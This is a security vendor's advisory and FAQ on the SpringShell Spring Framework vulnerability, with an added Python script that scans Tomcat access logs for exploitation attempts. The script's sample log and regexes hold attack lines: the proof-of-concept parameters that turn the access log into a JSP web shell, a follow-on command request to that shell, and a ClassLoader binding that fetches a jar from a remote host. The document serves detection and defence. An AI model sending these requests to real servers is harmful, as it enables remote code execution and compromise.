SpringShell: What You Need to Know About This Vulnerability
March 30, 2022 • RBS
Update: This article was updated on April 25, 2022.
A new remote code execution (RCE) vulnerability is emerging that security teams may soon be asked to remediate. Risk Based Security and Flashpoint have analyzed the "SpringShell" vulnerability, also being called "Spring4Shell". In some circles it is compared to, or even rumored to be, the next Log4Shell: like Log4Shell it is a library vulnerability that could potentially affect a wide variety of software. As we continue to gather facts, we will update this article with information that helps organizations decide whether to prioritize this issue. As of March 31, 2022, Spring has released patched versions of Spring Framework (5.3.18 and 5.2.20) that address the vulnerability, and a Spring Boot release is in progress.
Here’s a summary of what we know about SpringShell at this time:
SpringShell FAQ: How big of a threat is it?
Is it SpringShell or Spring4Shell?
Risk Based Security recognizes that a distinct "Spring Shell" project already exists (a Spring project for building command-line applications), which makes the SpringShell name confusing. We sympathize with those who have voiced concerns and agree that SpringShell is a poor name.
However, since SpringShell has already been coined for this issue, we will continue to use it to avoid future misinformation. We also encourage others not to use the "Spring4Shell" variation: the '4' is arbitrary and only echoes the name of the Log4j library. Spring4Shell implies that this issue is as severe as Log4Shell, and current information does not support that.
Does SpringShell have a CVE ID?
SpringShell was disclosed on March 29, 2022, and was assigned CVE-2022-22965 two days later. At the time of writing the entry is still in RESERVED status, but according to the vendor, the "specific exploit requires the application to run on Tomcat as a WAR deployment." Our analysts have confirmed the vulnerability in this environment; other environments may be affected as well.
Is SpringShell exploitable right now?
A proof-of-concept (PoC) for remote code execution has been published and validated against Spring Core. The PoC abuses Spring's request-parameter data binding to reach the ClassLoader of the running web application and, through it, reconfigure Tomcat's access log valve (its directory, file prefix and suffix, and log pattern) so that attacker-supplied JSP code is written into a log file placed under the web root. Requesting that file then executes it, giving remote code execution.
At this time the vulnerability is known to affect applications running on JDK 9 and newer, and the exploits seen in the wild target applications deployed to Tomcat as a WAR. Those prerequisites are fairly specific, but since Spring Core is a library, the exploit path will vary from application to application. More information is needed to assess how many deployments match those conditions; until then, SpringShell should not be treated as the next Log4Shell.
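To hunt for the request pattern the PoC described above leaves behind, here is an added example (not code from this article or from the Spring project) that scans Tomcat access-log lines for requests that try to bind ClassLoader properties, and that separately flags follow-on requests to a JSP from a source that attempted the log-to-JSP write. It assumes the log is in Tomcat's "common" format (`%h %l %u %t "%r" %s %b`); the sample log lines are constructed for the example using RFC 5737 documentation addresses, and the parameter names in line 2 mirror the public PoC. Because an access log records only the request line, parameters sent in a POST body are invisible to this check, so an empty result does not prove a host was not targeted.

```python
"""Hunt for SpringShell (CVE-2022-22965) exploitation attempts in Tomcat access logs.

Added example, not code from the article or the Spring project. Assumes Tomcat's
"common" access-log format:  %h %l %u %t "%r" %s %b
so the request line (method, target, protocol) is the first quoted field.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# Property path the public PoC walks from a bound bean to the web application's
# ClassLoader. Case-insensitive because Spring's binder also accepts "Class.", which
# is why the vendor workaround disallows class.*, Class.*, *.class.* and *.Class.*.
CLASSLOADER_PATH = re.compile(r"(^|\.)class\.(module\.)?classloader(\.|$)", re.IGNORECASE)

# AccessLogValve properties the PoC sets (via ...resources.context.parent.pipeline.first)
# so that the access log itself is written as a .jsp under the web root.
VALVE_WRITE_PROPS = {"pattern", "suffix", "directory", "prefix", "filedateformat"}


def parse_line(line):
    """Split one log line into host, method, path, query parameters and status."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = m.group("request").split(" ")
    if len(parts) < 2:
        return None
    target = urlsplit(parts[1])
    return {
        "host": m.group("host"),
        "method": parts[0],
        "path": target.path,
        # keep_blank_values: the PoC deliberately sends an empty fileDateFormat
        "params": parse_qsl(target.query, keep_blank_values=True),
        "status": m.group("status"),
    }


def classify(params):
    """Return (severity, reason, hit_names) for a request's parameters, or None."""
    hits = [name for name, _ in params if CLASSLOADER_PATH.search(name)]
    if not hits:
        return None
    leaves = {name.rsplit(".", 1)[-1].lower() for name in hits}
    valve = any(".pipeline.first." in name.lower() for name in hits)
    if valve and leaves & VALVE_WRITE_PROPS:
        return ("high", "AccessLogValve reconfiguration via ClassLoader binding "
                        "(log-to-JSP write primitive)", hits)
    return ("medium", "ClassLoader property binding attempt", hits)


def scan(lines):
    """Scan log lines; also flag later JSP hits from a host that attempted the write."""
    findings = []
    writers = set()
    for n, line in enumerate(lines, 1):
        req = parse_line(line)
        if req is None:
            continue
        verdict = classify(req["params"])
        if verdict is not None:
            severity, reason, hits = verdict
            if severity == "high":
                writers.add(req["host"])
        elif (req["host"] in writers and req["path"].lower().endswith(".jsp")
              and req["status"] == "200"):
            severity, reason, hits = ("high", "JSP served to a host that attempted the "
                                      "log-to-JSP write (possible web shell)", [])
        else:
            continue
        findings.append({"line": n, "host": req["host"], "method": req["method"],
                         "path": req["path"], "status": req["status"],
                         "severity": severity, "reason": reason, "params": hits})
    return findings


# Constructed sample (RFC 5737 addresses). Line 2 mirrors the public PoC's parameter
# set; line 3 is the follow-on request to the dropped JSP; line 5 is a probe that
# touches the ClassLoader without the valve properties.
SAMPLE_LOG = """\
198.51.100.7 - - [31/Mar/2022:09:58:01 +0000] "GET /app/ HTTP/1.1" 200 5123
203.0.113.5 - - [31/Mar/2022:10:02:44 +0000] "GET /app/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1" 200 0
203.0.113.5 - - [31/Mar/2022:10:02:45 +0000] "GET /tomcatwar.jsp?pwd=j&cmd=id HTTP/1.1" 200 37
203.0.113.9 - - [31/Mar/2022:10:07:12 +0000] "POST /app/login HTTP/1.1" 302 -
203.0.113.9 - - [31/Mar/2022:10:07:13 +0000] "GET /app/?Class.module.classLoader.URLs%5B0%5D=http://203.0.113.9/x.jar HTTP/1.1" 400 0
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"line {f['line']:>2} {f['severity']:<6} {f['host']:<12} "
              f"{f['method']} {f['path']}  {f['reason']}")
```

The "medium" verdict is worth keeping even though it is not the write primitive: any request that names a `classLoader` property on a bound object is something no legitimate form does, and scanners probe with exactly such parameters before committing to the full payload. Run it against `scan(open(path).read().splitlines())` for a real `localhost_access_log` file.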
Threat actors have reportedly attempted to exploit SpringShell to install the Mirai botnet, and more recent reports describe attacks attempting to install cryptomining malware.
Does SpringShell have any limiting factors?
This issue reportedly affects applications using Spring Framework on Java Development Kit (JDK) 9 and newer; the exploit reaches the ClassLoader through the Class.getModule() accessor that JDK 9 introduced, which is why older JDKs are not affected. The vendor's other prerequisites for the known exploit are Apache Tomcat as the servlet container, deployment as a WAR rather than an executable jar, and a dependency on spring-webmvc or spring-webflux. Veracode has also released additional details on SpringShell's exploitation and its limiting factors.
What are the CVSS scores for SpringShell?
SpringShell has a CVSSv2 score of 10.0 and a CVSSv3 score of 9.8, like most RCE vulnerabilities. However, the way the vulnerable code is actually used may reduce the risk, and since Spring is both a framework and a library, the issue can manifest in numerous ways. A given deployment could lower SpringShell's impact, increase its access complexity, or require authentication to exploit. CVSS nevertheless requires scoring under a "worst case scenario", so the scores remain high:
CVSSv2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSSv3 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
How popular is the Spring Framework?
Spring Framework claims to be the world’s most popular Java framework, with major vendors such as Alibaba and Amazon contributing.
What are threat actors saying about SpringShell?
According to BleepingComputer, several sources have stated that SpringShell is being actively exploited, and the Mirai malware has been observed leveraging the SpringShell exploit to recruit infected machines for DDoS attacks. GreyNoise has also reported that two "Spring" vulnerabilities, including SpringShell, are being actively exploited in the wild. CISA added SpringShell to its Known Exploited Vulnerabilities Catalog on April 4, 2022.
SpringShell’s Further Updates
We will update this post as more details about SpringShell become known. Contact us to learn more about SpringShell, RCE issues, 0-day vulnerabilities, or the 93,000+ known vulnerabilities without a CVE ID.